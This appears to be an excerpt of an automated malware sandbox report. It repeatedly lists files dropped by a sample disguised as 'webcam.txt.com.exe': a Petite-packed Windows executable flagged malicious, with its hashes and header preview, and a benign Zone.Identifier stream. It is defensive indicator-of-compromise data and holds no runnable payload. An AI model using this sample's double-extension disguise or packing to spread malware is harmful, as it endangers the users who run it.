                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
